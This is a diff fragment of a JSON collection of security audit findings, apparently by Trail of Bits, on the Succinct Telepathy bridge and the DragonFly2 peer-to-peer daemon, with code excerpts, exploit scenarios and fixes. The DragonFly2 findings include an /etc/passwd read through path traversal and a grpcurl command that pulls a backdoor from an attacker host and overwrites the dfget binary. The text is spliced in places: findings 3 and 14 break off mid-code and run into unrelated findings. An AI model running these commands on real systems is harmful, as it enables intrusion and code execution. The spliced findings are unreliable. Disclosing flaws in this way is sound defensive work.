Incorrect handling of point doubling can allow signature forgery ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "When verifying the sync committee signature, individual public keys are aggregated into an overall public key by repeatedly calling G1Add in a tree structure. Due to the mishandling of elliptic curve point doublings, a minority of carefully selected public keys can cause the aggregation to result in an arbitrary, maliciously chosen public key, allowing signature forgeries and thus malicious light client updates. When bit1 and bit2 of G1Add are both set, G1Add computes out by calling EllipticCurveAddUnequal : template parallel G1Add(N, K) { var P[ 7 ] = getBLS128381Prime(); signal input pubkey1[ 2 ][K]; signal input pubkey2[ 2 ][K]; signal input bit1; signal input bit2; /* COMPUTE BLS ADDITION */ signal output out[ 2 ][K]; signal output out_bit; out_bit <== bit1 + bit2 - bit1 * bit2; component adder = EllipticCurveAddUnequal( 55 , 7 , P); for ( var i = 0 ; i < 2 ; i++) { for ( var j = 0 ; j < K; j++) { adder.a[i][j] <== pubkey1[i][j]; adder.b[i][j] <== pubkey2[i][j]; } } Figure 3.1: telepathy/circuits/circuits/bls.circom#82 The results of EllipticCurveAddUnequal are constrained by equations that reduce to 0 = 0 if a and b are equal: // constrain x_3 by CUBIC (x_1 + x_2 + x_3) * (x_2 - x_1)^2 - (y_2 - y_1)^2 = 0 mod p component dx_sq = BigMultShortLong(n, k, 2 *n+LOGK+ 2 ); // 2k-1 registers abs val < k*2^{2n} component dy_sq = BigMultShortLong(n, k, 2 *n+LOGK+ 2 ); // 2k-1 registers < k*2^{2n} for ( var i = 0 ; i < k; i++){ dx_sq.a[i] <== b[ 0 ][i] - a[ 0 ][i]; dx_sq.b[i] <== b[ 0 ][i] - a[ 0 ][i]; dy_sq.a[i] <== b[ 1 ][i] - a[ 1 ][i]; dy_sq.b[i] <== b[ 1 ][i] - a[ 1 ][i]; } [...] component cubic_mod = SignedCheckCarryModToZero(n, k, 4 *n + LOGK3, p); for ( var i = 0 ; i < NUM_HASHERS; i++) { var POSEIDON_SIZE = 15 ; if (i > 0 ) { POSEIDON_SIZE = 16 ; } hashers[i] = Poseidon(POSEIDON_SIZE); for ( var j = 0 ; j < 15 ; j++) { if (i * 15 + j >= LENGTH ) { hashers[i].inputs[j] <== 0 ; } else { hashers[i].inputs[j] <== in [i*15 + j]; } } if (i > 0 ) { hashers[i].inputs[15] <== hashers[i- 1 ]. out ; } } out <== hashers[NUM_HASHERS-1]. out ; } Figure 6.1: telepathy/circuits/circuits/poseidon.circom#25-51 The Poseidon authors recommend using a sponge construction, which has better provable security properties than the MD construction. One could implement a sponge by using PoseidonEx with nOuts = 1 for intermediate calls and nOuts = 2 for the final call. For each call, out[0] should be passed into the initialState of the next PoseidonEx component, and out[1] should be used for the final output. By maintaining out[0] as hidden capacity, the overall construction will closely approximate a pseudorandom function. Although the MD construction offers sufficient protection against collision for the current commitment use case, hash functions constructed in this manner do not fully model random functions. Future uses of the PoseidonFieldArray circuit may expect stronger cryptographic properties, such as resistance to length extension. Additionally, by utilizing the initialState input, as shown in figure 6.2, on each permutation call, 16 inputs can be compressed per template instantiation, as opposed to the current 15, without any additional cost per compression. This will reduce the number of compressions required and thus reduce the size of the circuit.
template PoseidonEx(nInputs, nOuts) { signal input inputs[nInputs]; signal input initialState; signal output out [nOuts]; Figure 6.2: circomlib/circuits/poseidon.circom#67-70 Recommendations Short term, convert PoseidonFieldArray to use a sponge construction, ensuring that out[0] is preserved as a hidden capacity value. Long term, ensure that all hashing primitives are used in accordance with the published recommendations.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "7. Merkle root reconstruction is vulnerable to forgery via proofs of incorrect length ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "The TargetAMB contract accepts and verifies Merkle proofs that a particular smart contract event was issued in a particular Ethereum 2.0 beacon block. Because the proof validation depends on the length of the proof rather than the index of the value to be proved, Merkle proofs with invalid lengths can be used to mislead the verifier and forge proofs for nonexistent transactions. The SSZ.restoreMerkleRoot function reconstructs a Merkle root from the user-supplied transaction receipt and Merkle proof; the light client then compares the root against the known-good value stored in the LightClient contract. The index argument to restoreMerkleRoot determines the specific location in the block state tree at which the leaf node is expected to be found. The arguments leaf and branch are supplied by the prover, while the index argument is calculated by the smart contract verifier. function restoreMerkleRoot ( bytes32 leaf , uint256 index , bytes32 [] memory branch) internal pure returns ( bytes32 ) { bytes32 value = leaf; for ( uint256 i = 0 ; i < branch.length; i++) { if ((index / ( 2 ** i)) % 2 == 1 ) { value = sha256( bytes .concat(branch[i], value)); } else { value = sha256( bytes .concat(value, branch[i])); } } return value; } Figure 7.1: telepathy/contracts/src/libraries/SimpleSerialize.sol#24-38 A malicious user may supply a proof (i.e., a branch list) that is longer or shorter than the number of bits in the index . In this case, the leaf value will not in fact correspond to the receiptRoot but to some other value in the tree. In particular, the user can convince the smart contract that receiptRoot is the value at any generalized index given by truncating the leftmost bits of the true index or by extending the index by arbitrarily many zeroes following the leading set bit. If one of these alternative indexes contains data controllable by the user, who may for example be the block proposer, then the user can forge a proof for a transaction that did not occur and thus steal funds from bridges relying on the TargetAMB . Exploit Scenario Alice, a malicious ETH2.0 validator, encodes a fake transaction receipt hash encoding a deposit to a cross-chain bridge into the graffiti field of a BeaconBlock . She then waits for the block to be added to the HistoricalBlocks tree and further for the generalized index of the historical block to coincide with an allowable index for the Merkle tree reconstruction. She then calls executeMessageFromLog with the transaction receipt, allowing her to withdraw from the bridge based on a forged proof of deposit and steal funds. Recommendations Short term, rewrite restoreMerkleRoot to loop over the bits of index , e.g., with a while loop terminating when index = 1 . Long term, ensure that proof verification routines do not use control flow determined by untrusted input. The verification routine for each statement to be proven should treat all possible proofs uniformly.
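The recommended structure can be illustrated with the following Go sketch (the production fix would be in Solidity); the loop consumes one branch node per bit of index and fails if the proof length does not match exactly:

package merkle

import "crypto/sha256"

// restoreMerkleRoot walks up the tree driven by the bits of index rather
// than by len(branch), so a proof of the wrong length can no longer steer
// the reconstruction to a different generalized index.
func restoreMerkleRoot(leaf [32]byte, index uint64, branch [][32]byte) ([32]byte, bool) {
	value := leaf
	used := 0
	for index > 1 { // stop at the root: generalized index 1
		if used >= len(branch) {
			return [32]byte{}, false // proof shorter than the index requires
		}
		if index%2 == 1 {
			value = sha256.Sum256(append(branch[used][:], value[:]...))
		} else {
			value = sha256.Sum256(append(value[:], branch[used][:]...))
		}
		index /= 2
		used++
	}
	if used != len(branch) {
		return [32]byte{}, false // proof longer than the index requires
	}
	return value, true
}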
", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "8. LightClient forced finalization could allow bad updates in case of a DoS ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "Under periods of delayed finality, the LightClient may finalize block headers with few validators participating. If the Telepathy provers were targeted by a denial-of-service (DoS) attack, this condition could be triggered and used by a malicious validator to take control of the LightClient and finalize malicious block headers. The LightClient contract typically considers a block header to be finalized if it is associated with a proof that more than two-thirds of sync committee participants have signed the header. Typically, the sync committee for the next period is determined from a finalized block in the current period. However, in the case that the end of the sync committee period is reached before any block containing a sync committee update is finalized, a user may call the LightClient.force function to apply the update with the most signatures, even if that update has less than a majority of signatures. A forced update may have as few as 10 participating signers, as determined by the constant MIN_SYNC_COMMITTEE_PARTICIPANTS . /// @notice In the case there is no finalization for a sync committee rotation, this method /// is used to apply the rotate update with the most signatures throughout the period. /// @param period The period for which we are trying to apply the best rotate update for. function force ( uint256 period ) external { LightClientRotate memory update = bestUpdates[period]; uint256 nextPeriod = period + 1 ; if (update.step.finalizedHeaderRoot == 0 ) { revert( \"Best update was never initialized\" ); } else if (syncCommitteePoseidons[nextPeriod] != 0 ) { revert( \"Sync committee for next period already initialized.\" ); } else if (getSyncCommitteePeriod(getCurrentSlot()) < nextPeriod) { revert( \"Must wait for current sync committee period to end.\" ); } setSyncCommitteePoseidon(nextPeriod, update.syncCommitteePoseidon); } Figure 8.1: telepathy/contracts/src/lightclient/LightClient.sol#123 Proving sync committee updates via the rotate ZK circuit requires significant computational power; it is likely that there will be only a few provers online at any given time. In this case, a DoS attack against the active provers could cause the provers to be offline for a full sync committee period (~27 hours), allowing the attacker to force an update with a small minority of validator stake. The attacker would then gain full control of the light client and be able to steal funds from any systems dependent on the correctness of the light client. Exploit Scenario Alice, a malicious ETH2.0 validator, controls about 5% of the total validator stake, split across many public keys. She waits for a sync committee period in which at least 10 of her public keys are included, then launches a DoS against the active Telepathy provers, using an attack such as that described in TOB-SUCCINCT-1 or an attack against the off-chain prover/relayer client itself. Alice creates a forged beacon block with a new sync committee containing only her own public keys, then uses her 10 active committee keys to sign the block.
She calls LightClient.rotate with this forged block and waits until the sync committee period ends, finally calling LightClient.force to gain control over all future light client updates. Recommendations Short term, consider removing the LightClient.force function, extending the waiting period before updates may be forced, or introducing a privileged role to mediate forced updates. Long term, explicitly document expected liveness behavior and associated safety tradeoffs.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Medium" + ] + }, + { + "title": "9. G1AddMany does not check for the point at infinity ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "The G1AddMany circuit aggregates multiple public keys into a single public key before verifying the BLS signature. The outcome of the aggregation is used within CoreVerifyPubkeyG1 as the public key. However, G1AddMany ignores the value of the final out_bits, and wrongly converts a point at infinity to a different point when all participation bits are zero. template G1AddMany(SYNC_COMMITTEE_SIZE, LOG_2_SYNC_COMMITTEE_SIZE, N, K) { signal input pubkeys[SYNC_COMMITTEE_SIZE][2][K]; signal input bits[SYNC_COMMITTEE_SIZE]; signal output out[2][K]; [...] for (var i = 0; i < 2; i++) { for (var j = 0; j < K; j++) { out[i][j] <== reducers[LOG_2_SYNC_COMMITTEE_SIZE-1].out[0][i][j]; } } } Figure 9.1: BLS key aggregation without checks for all-zero participation bits (telepathy/circuits/circuits/bls.circom#16–48) Recommendations Short term, augment the G1AddMany template with an output signal that indicates whether the aggregated public key is the point at infinity. Check that the aggregated public key is non-zero in the calling circuit by verifying that the output of G1AddMany is not the point at infinity (for instance, in VerifySyncCommitteeSignature). Long term, assert that all provided elliptic curve points are non-zero before converting them to affine form and using them where a non-zero point is expected.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "10. TargetAMB receipt proof may behave unexpectedly on future transaction types ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "The TargetAMB contract can relay transactions from the SourceAMB via events logged in transaction receipts. The contract currently ignores the version specifier in these receipts, which could cause unexpected behavior in future upgrade hard-forks. To relay a transaction from a receipt, the user provides a Merkle proof that a particular transaction receipt is present in a specified block; the relevant event is then parsed from the transaction receipt by the TargetAMB. function getEventTopic(...) { ... bytes memory value = MerklePatriciaProofVerifier.extractProofValue(receiptRoot, key, proofAsRLP); RLPReader.RLPItem memory valueAsItem = value.toRlpItem(); if (!valueAsItem.isList()) { // TODO: why do we do this ... valueAsItem.memPtr++; valueAsItem.len--; } RLPReader.RLPItem[] memory valueAsList = valueAsItem.toList(); require(valueAsList.length == 4, \"Invalid receipt length\"); // In the receipt, the 4th entry is the logs RLPReader.RLPItem[] memory logs = valueAsList[3].toList(); require(logIndex < logs.length, \"Log index out of bounds\"); RLPReader.RLPItem[] memory relevantLog = logs[logIndex].toList(); ...
} Figure 10.1: telepathy/contracts/src/libraries/StateProofHelper.sol#L44–L82 The logic in figure 10.1 checks if the transaction receipt is an RLP list; if it is not, the logic skips one byte of the receipt before continuing with parsing. This logic is required in order to properly handle legacy transaction receipts as defined in EIP-2718. Legacy transaction receipts directly contain the RLP-encoded list rlp([status, cumulativeGasUsed, logsBloom, logs]), whereas EIP-2718 typed transaction receipts are encoded as TransactionType || TransactionPayload, where TransactionType is a one-byte indicator between 0x00 and 0x7f and TransactionPayload may vary depending on the transaction type. Current valid transaction types are 0x01 and 0x02. New transaction types may be added during routine Ethereum upgrade hard-forks. The TransactionPayload field of type 0x01 and 0x02 transactions corresponds exactly to the LegacyTransactionReceipt format; thus, simply skipping the initial byte is sufficient to handle these cases. However, EIP-2718 does not guarantee this backward compatibility, and future hard-forks may introduce transaction types for which this parsing method gives incorrect results. Because the current implementation lacks explicit validation of the transaction type, this discrepancy may go unnoticed and lead to unexpected behavior. Exploit Scenario An Ethereum upgrade fork introduces a new transaction type with a corresponding transaction receipt format that differs from the legacy format. If the new format has the same number of fields but with different semantics in the fourth slot, it may be possible for a malicious user to insert into that slot a value that parses as an event log for a transaction that did not take place, thus forging an arbitrary bridge message. Recommendations Short term, check the first byte of valueAsItem against a list of allowlisted transaction types, and revert if the transaction type is invalid. Long term, plan for future incompatibilities due to upgrade forks; for example, consider adding a semi-trusted role responsible for adding new transaction type identifiers to an allowlist.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "11. RLPReader library does not validate proper RLP encoding ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "The TargetAMB uses the external RLPReader dependency to parse RLP-encoded nodes in the Ethereum state trie, including those provided by the user as part of a Merkle proof. When parsing a byte string as an RLPItem, the library does not check that the encoded payload length of the RLPItem matches the length of the underlying bytes. /* * @param item RLP encoded bytes */ function toRlpItem(bytes memory item) internal pure returns (RLPItem memory) { uint256 memPtr; assembly { memPtr := add(item, 0x20) } return RLPItem(item.length, memPtr); } Figure 11.1: Solidity-RLP/contracts/RLPReader.sol#51–61 If the encoded byte length of the RLPItem is too long or too short, future operations on the RLPItem may access memory before or after the bounds of the underlying buffer. More generally, because the Merkle trie verifier assumes that all input is in the form of valid RLP-encoded data, it is important to check that potentially malicious data is properly encoded.
While we did not identify any way to convert improperly encoded proof data into a proof forgery, it is simple to give an example of an out-of-bounds read that could possibly lead in other contexts to unexpected behavior. In figure 11.2, the result of items[0].toBytes() contains many bytes read from memory beyond the bounds allocated in the initial byte string. RLPReader.RLPItem memory item = RLPReader.toRlpItem('\\xc3\\xd0'); RLPReader.RLPItem[] memory items = item.toList(); assert(items[0].toBytes().length == 16); Figure 11.2: Out-of-bounds read due to invalid RLP encoding In this example, RLPReader.toRLPItem should revert because the encoded length of three bytes is longer than the payload length of the string; similarly, the call to toList() should fail because the nested RLPItem encodes a length of 16, again more than the underlying buffer. To prevent such ill-constructed nested RLPItems, the internal numItems function should revert if currPtr is not exactly equal to endPtr at the end of the loop shown in figure 11.3. // @return number of payload items inside an encoded list. function numItems(RLPItem memory item) private pure returns (uint256) { if (item.len == 0) return 0; uint256 count = 0; uint256 currPtr = item.memPtr + _payloadOffset(item.memPtr); uint256 endPtr = item.memPtr + item.len; while (currPtr < endPtr) { currPtr = currPtr + _itemLength(currPtr); // skip over an item count++; } return count; } Figure 11.3: Solidity-RLP/contracts/RLPReader.sol#256–269 Recommendations Short term, add a check in RLPReader.toRLPItem that validates that the length of the argument exactly matches the expected length of prefix + payload based on the encoded prefix. Similarly, add a check in RLPReader.numItems, checking that the sum of the encoded lengths of sub-objects matches the total length of the RLP list. Long term, treat any length values or pointers in untrusted data as potentially malicious and carefully check that they are within the expected bounds.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "12. TargetAMB _executeMessage lacks contract existence checks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "When relaying messages on the target chain, the TargetAMB records the success or failure of the external contract call so that off-chain clients can track the success of their messages. However, if the recipient of the call is an externally owned account or is otherwise empty, the handleTelepathy call will appear to have succeeded when it was not processed by any recipient. bytes memory recieveCall = abi.encodeWithSelector( ITelepathyHandler.handleTelepathy.selector, message.sourceChainId, message.senderAddress, message.data ); address recipient = TypeCasts.bytes32ToAddress(message.recipientAddress); (status,) = recipient.call(recieveCall); if (status) { messageStatus[messageRoot] = MessageStatus.EXECUTION_SUCCEEDED; } else { messageStatus[messageRoot] = MessageStatus.EXECUTION_FAILED; } Figure 12.1: telepathy/contracts/src/amb/TargetAMB.sol#150–164 Exploit Scenario A user accidentally sends a transaction to the wrong address or an address that does not exist on the target chain. The UI displays the transaction as successful, possibly confusing the user further. Recommendations Short term, change the handleTelepathy interface to expect a return value and check that the return value is some magic constant, such as the four-byte ABI selector.
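A minimal sketch of that check (our illustration, under the assumption that handleTelepathy is changed to return bytes4; it reuses the names from figure 12.1):
// Sketch: a contract that actually processed the message returns the
// handleTelepathy selector; an EOA or empty account cannot do so.
(bool status, bytes memory ret) = recipient.call(recieveCall);
bool handled = status && ret.length == 32 &&
    abi.decode(ret, (bytes4)) == ITelepathyHandler.handleTelepathy.selector;
messageStatus[messageRoot] = handled
    ? MessageStatus.EXECUTION_SUCCEEDED
    : MessageStatus.EXECUTION_FAILED;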
See OpenZeppelin's safeTransferFrom / IERC721Receiver pattern for an example. Long term, ensure that all low-level calls behave as expected when handling externally owned accounts.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "13. LightClient is unable to verify some block headers ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "The LightClient contract expects beacon block headers produced in a period prior to the period in which they are finalized to be signed by the wrong sync committee; those blocks will not be validated by the LightClient, and AMB transactions in these blocks may be delayed. The Telepathy light client tracks only block headers that are finalized, as defined by the ETH2.0 Casper finality mechanism. Newly proposed, unfinalized beacon blocks contain a finalized_checkpoint field with the most recently finalized block hash. The Step circuit currently exports only the slot number of this nested, finalized block as a public input. The LightClient contract uses this slot number to determine which sync committee it expects to sign the update. However, the correct slot number for this use is in fact that of the wrapping, unfinalized block. In some cases, such as near the edge of a sync committee period or during periods of delayed finalization, the two slots may not belong to the same sync committee period. In this case, the signature will fail to verify, and the LightClient will become unable to validate the block header. Exploit Scenario A user sends an AMB message using the SourceAMB.sendViaLog function. The beacon block in which this execution block is included is late within a sync committee period and is not finalized on the beacon chain until the next period. The new sync committee signs the block, but this signature is rejected by the light client because it expects a signature from the old committee. Because this header cannot be finalized in the light client, the TargetAMB cannot relay the message until some future block in the new sync committee period is finalized in the light client, causing delivery delays. Recommendations Short term, include attestedSlot in the public input commitment to the Step circuit. This can be achieved at no extra cost by packing the eight-byte attestedSlot value alongside the eight-byte finalizedSlot value, which currently is padded to 32 bytes. Long term, add additional unit and end-to-end tests to focus on cases where blocks are near the edges of epochs and sync committee periods. Further, reduce gas usage and circuit complexity by packing all public inputs to the step function into a single byte array that is hashed in one pass, rather than chaining successive calls to SHA-256, which reduces the effective rate by half and incurs overhead due to the additional external precompile calls.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "14. OptSimpleSWU2 Y-coordinate output is underconstrained ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-succinct-securityreview.pdf", + "body": "The OptSimpleSWU2 circuit does not check that its Y-coordinate output is a properly formatted BigInt. This violates the canonicity assumptions of the Fp2Sgn0 circuit and other downstream components, possibly leading to unexpected nondeterminism in the sign of the output of MapToG2.
Incorrect results from MapToG2 would cause the circuit to verify the provided signature against a message different from that in the public input. While this does not allow malicious provers to forge signatures on arbitrary messages, this additional degree of freedom in witness generation could interact negatively with future changes to the codebase or instantiations of this circuit. var Y[2][50]; ... component Y_sq = Fp2Multiply(n, k, p); // Y^2 == g(X) for (var i = 0; i < 2; i++) for ( var idx= 0 ; idx/?peerId=172.17.0.1-1- HTTP / 1.1 Host: $BOB_IP:55002 Range: bytes=0-100 Figure 12.7: Bob's response, revealing /etc/passwd contents Later, Alice uploads a malicious backdoor executable to the peer-to-peer network. Once Bob has downloaded (e.g., via the exportFromPeers method) and cached the backdoor file, Alice sends a request like the one shown in figure 12.8 to overwrite the /opt/dragonfly/bin/dfget binary with the backdoor. grpcurl -plaintext -format json -d \\ '{\"url\":\"http://alice.com/backdoor\", \"output\":\"/opt/dragonfly/bin/dfget\", \"urlMeta\":{\"digest\": \"md5:aaaff\", \"tag\":\"tob\"}}' $BOB_IP:65000 dfdaemon.Daemon.ExportTask Figure 12.8: Command to overwrite dfget binary After some time Bob restarts the dfget daemon, which executes Alice's backdoor on his machine. Recommendations Short term, sandbox the DragonFly2 daemon, so that it can access only files within a certain directory. Mitigate path traversal attacks. Ensure that APIs exposed by peers cannot be used by malicious actors to gain arbitrary file read or write, code execution, HTTP request forgery, and other unintended capabilities.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "13. Manager generates mTLS certificates for arbitrary IP addresses ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-dragonfly2-securityreview.pdf", + "body": "A peer can obtain a valid TLS certificate for arbitrary IP addresses, effectively rendering the mTLS authentication useless. The issue is that the Manager's Certificate gRPC service does not validate if the requested IP addresses belong to the peer requesting the certificate; that is, if the peer connects from the same IP address as the one provided in the certificate request. Please note that the issue is known to developers and marked with TODO comments, as shown in figure 13.1. if addr, ok := p.Addr.(*net.TCPAddr); ok { ip = addr.IP.String() } else { ip, _, err = net.SplitHostPort(p.Addr.String()) if err != nil { return nil, err } } // Parse csr. [skipped] // Check csr signature. // TODO check csr common name and so on. if err = csr.CheckSignature(); err != nil { return nil, err } [skipped] // TODO only valid for peer ip // BTW we need support both of ipv4 and ipv6. ips := csr.IPAddresses if len(ips) == 0 { // Add default connected ip. ips = []net.IP{net.ParseIP(ip)} } Figure 13.1: The Manager's Certificate gRPC handler for the IssueCertificate endpoint (Dragonfly2/manager/rpcserver/security_server_v1.go#65–98) Recommendations Short term, implement the missing IP address validation in the IssueCertificate endpoint of the Manager's Certificate gRPC service. Ensure that a peer cannot obtain a certificate with an ID that does not belong to the peer. Long term, research common security problems in PKI infrastructures and ensure that DragonFly2's PKI does not have them.
Ensure that if a peer IP address changes, the certificates issued for that IP are revoked.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "14. gRPC requests are weakly validated ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-dragonfly2-securityreview.pdf", + "body": "The gRPC requests are weakly validated, and some request fields are not validated at all. For example, the ImportTaskRequest's url_meta field is not validated and may be missing from a request (see figure 14.1). Sending requests to the ImportTask endpoint (as shown in figure 14.2) triggers the code shown in figure 14.3. The highlighted call to the logger accesses the req.UrlMeta.Tag variable, causing a nil dereference panic (because the req.UrlMeta variable is nil). message ImportTaskRequest { // Download url. string url = 1 [(validate.rules).string.min_len = 1]; // URL meta info. common.UrlMeta url_meta = 2; // File to be imported. string path = 3 [(validate.rules).string.min_len = 1]; // Task type. common.TaskType type = 4; } Figure 14.1: ImportTaskRequest definition, with the url_meta field missing any validation rules (api/pkg/apis/dfdaemon/v1/dfdaemon.proto#76–85) grpcurl -plaintext -format json -d \\ '{\"url\":\"http://example.com\", \"path\":\"x\"}' $PEER_IP:65000 dfdaemon.Daemon.ImportTask Figure 14.2: An example command that triggers panic in the daemon gRPC server s.Keep() peerID := idgen.PeerIDV1(s.peerHost.Ip) taskID := idgen.TaskIDV1(req.Url, req.UrlMeta) log := logger.With(\"function\", \"ImportTask\", \"URL\", req.Url, \"Tag\", req.UrlMeta.Tag, \"taskID\", taskID, \"file\", req.Path) Figure 14.3: The req.UrlMeta variable may be nil (Dragonfly2/client/daemon/rpcserver/rpcserver.go#871–874) Another example of weak validation can be observed in the definition of the UrlMeta request (figure 14.4). The digest field of the request should contain a prefix followed by either an MD5 or a SHA256 hex-encoded hash. While the prefix and hex encoding are validated, the length of the hash is not. The length is validated only during parsing. // UrlMeta describes url meta info. message UrlMeta { // Digest checks integrity of url content, for example md5:xxx or sha256:yyy. string digest = 1 [(validate.rules).string = {pattern: \"^(md5)|(sha256):[A-Fa-f0-9]+$\", ignore_empty: true}]; Figure 14.4: The UrlMeta request definition, with a regex validation of the digest field (api/pkg/apis/common/v1/common.proto#163–166) Recommendations Short term, add missing validations for the ImportTaskRequest and UrlMeta messages. Centralize validation of external inputs, so that it is easy to understand what properties are enforced on the data. Validate data as early as possible (for example, in the proto-related code). Long term, use fuzz testing to detect missing validations.", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Low" + ] + }, + { + "title": "15. Weak integrity checks for downloaded files ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-dragonfly2-securityreview.pdf", + "body": "DragonFly2 uses a variety of hash functions, including the MD5 hash. This algorithm does not provide collision resistance; it is secure only against preimage attacks. While these security guarantees may be enough for the DragonFly2 system, it is not completely clear if there are any scenarios where lack of the collision resistance would compromise the system.
There are no clear benefits to keeping the MD5 hash function in the system. Figure 15.1 shows the core validation method that protects the integrity of files downloaded from the peer-to-peer network. As shown in the figure, the hash of a file (SHA256) is computed over the hashes of all of the file's pieces (MD5), so the security provided by the stronger SHA256 hash is lost because of the use of MD5. var pieceDigests []string for i := int32(0); i < t.TotalPieces; i++ { pieceDigests = append(pieceDigests, t.Pieces[i].Md5) } digest := digest.SHA256FromStrings(pieceDigests...) if digest != t.PieceMd5Sign { t.Errorf(\"invalid digest, desired: %s, actual: %s\", t.PieceMd5Sign, digest) t.invalid.Store(true) return ErrInvalidDigest } Figure 15.1: Part of the method responsible for validation of file integrity (Dragonfly2/client/daemon/storage/local_storage.go#255–265) The MD5 algorithm is hard-coded throughout the entire codebase (e.g., figure 15.2), but in some places the hash algorithm is configurable (e.g., figure 15.3). Further investigation is required to determine whether an attacker can exploit the configurability of the system to perform downgrade attacks; that is, to downgrade the security of the system by forcing users to use the MD5 algorithm, even when a more secure option is available. reader, err = digest.NewReader(digest.AlgorithmMD5, io.LimitReader(resp.Body, int64(req.piece.RangeSize)), digest.WithEncoded(req.piece.PieceMd5), digest.WithLogger(req.log)) Figure 15.2: Hardcoded hash function (Dragonfly2/client/daemon/peer/piece_downloader.go#188) switch algorithm { case AlgorithmSHA1: if len(encoded) != 40 { return nil, errors.New(\"invalid encoded\") } case AlgorithmSHA256: if len(encoded) != 64 { return nil, errors.New(\"invalid encoded\") } case AlgorithmSHA512: if len(encoded) != 128 { return nil, errors.New(\"invalid encoded\") } case AlgorithmMD5: if len(encoded) != 32 { return nil, errors.New(\"invalid encoded\") } default: return nil, errors.New(\"invalid algorithm\") } Figure 15.3: User-configurable hash function (Dragonfly2/pkg/digest/digest.go#111–130) Moreover, there are missing validations of the integrity hashes, for example in the ImportTask method (figure 15.4). // TODO: compute and check hash digest if digest exists in ImportTaskRequest Figure 15.4: Missing hash validation (Dragonfly2/client/daemon/rpcserver/rpcserver.go#904) Exploit Scenario Alice, a peer in the DragonFly2 system, creates two images: an innocent one, and one with malicious code. Both images consist of two pieces, and Alice generates the pieces so that their respective MD5 hashes collide (are the same). Therefore, the PieceMd5Sign metadata of both images are equal. Alice shares the innocent image with other peers, who attest to its validity (i.e., that it works as expected and is not malicious). Bob wants to download the image and requests it from the peer-to-peer network. After downloading the image, Bob checks its integrity with a SHA256 hash that is known to him. Alice, who is participating in the network, had already provided Bob the other image, the malicious one. Bob unintentionally uses the malicious image. Recommendations Short term, remove support for MD5. Always use SHA256, SHA3, or another secure hashing algorithm. Long term, take an inventory of all cryptographic algorithms used across the entire system. Ensure that no deprecated or non-recommended algorithms are used.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Medium" + ] + }, + { + "title": "16. 
Invalid error handling, missing return statement ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-dragonfly2-securityreview.pdf", + "body": "There are two instances of a missing return statement inside an if branch that handles an error from a downstream method. The first issue is in the UpdateTransportOption function, where failed parsing of the Proxy option prints an error but does not terminate execution of the UpdateTransportOption function. func UpdateTransportOption(transport *http.Transport, optionYaml []byte) error { [skipped] if len(opt.Proxy) > 0 { proxy, err := url.Parse(opt.Proxy) if err != nil { fmt.Printf(\"proxy parse error: %s\\n\", err) } transport.Proxy = http.ProxyURL(proxy) } Figure 16.1: the UpdateTransportOption function (Dragonfly2/pkg/source/transport_option.go#45–58) The second issue is in the GetV1Preheat method, where failed parsing of the rawID argument does not result in termination of the method execution. Instead, the id variable will be assigned either the zero or max_uint value. func (s *service) GetV1Preheat(ctx context.Context, rawID string) (*types.GetV1PreheatResponse, error) { id, err := strconv.ParseUint(rawID, 10, 32) if err != nil { logger.Errorf(\"preheat convert error\", err) } Figure 16.2: the GetV1Preheat function (Dragonfly2/manager/service/preheat.go#66–70) Recommendations Short term, add the missing return statements in the UpdateTransportOption and GetV1Preheat methods. Long term, use static analysis to detect similar bugs.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "17. Tiny file download uses hard-coded HTTP protocol ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-dragonfly2-securityreview.pdf", + "body": "The code in the scheduler for downloading a tiny file is hard-coded to use the HTTP protocol, rather than HTTPS. This means that an attacker could perform a Man-in-the-Middle attack, changing the network request so that a different piece of data gets downloaded. Due to the use of weak integrity checks (TOB-DF2-15), this modification of the data may go unnoticed. // DownloadTinyFile downloads tiny file from peer without range. func (p *Peer) DownloadTinyFile() ([]byte, error) { ctx, cancel := context.WithTimeout(context.Background(), downloadTinyFileContextTimeout) defer cancel() // Download url: http://${host}:${port}/download/${taskIndex}/${taskID}?peerId=${peerID} targetURL := url.URL{ Scheme: \"http\", Host: fmt.Sprintf(\"%s:%d\", p.Host.IP, p.Host.DownloadPort), Path: fmt.Sprintf(\"download/%s/%s\", p.Task.ID[:3], p.Task.ID), RawQuery: fmt.Sprintf(\"peerId=%s\", p.ID), } Figure 17.1: Hard-coded use of HTTP 